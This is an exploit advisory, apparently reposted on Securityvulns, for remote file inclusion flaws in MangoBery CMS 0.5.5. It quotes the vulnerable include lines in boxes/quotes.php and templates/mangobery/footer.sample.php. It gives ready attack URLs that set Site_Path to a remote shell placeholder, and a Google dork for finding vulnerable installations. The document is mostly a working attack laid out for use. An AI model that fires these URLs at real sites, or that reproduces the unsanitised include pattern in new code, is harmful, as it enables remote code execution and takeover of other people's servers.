SecurityvulnsSECURITYVULNS:DOC:16542MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability
Mangobery-0.5.5
Found by kezzap66345 *
Script Page:http://mangobery.sourceforge.net/
Demo Site:http://mangobery.beryllium.ca/
Script
Download:http://sourceforge.net/project/showfiles.php?group_id=63834&package_id=60858
Dork:http://www.google.com.tr/search?hl=tr&q=%22MangoBery+1.0+Alpha%22&meta=
ERROR#1:
File:boxes/quotes.php
<? include($Site_Path . 'tquotes/tq_getquote.inc') ?> <<< rfi coded
RFI#1:
http://SITE.com/path/boxes/quotes.php?Site_Path=[SHELL]
ERROR#2:
File:templates/mangobery/footer.sample.php
include($Site_Path . "includes/column_right.php"); <<< rfi coded
RFI#2:
http://SITE.com/path/templates/mangobery/footer.sample.php?Site_Path=[SHELL]
Thanks:Siircicocuk and x0r0n
ThanxSiiRCiCOCUK**str0ke**************************************************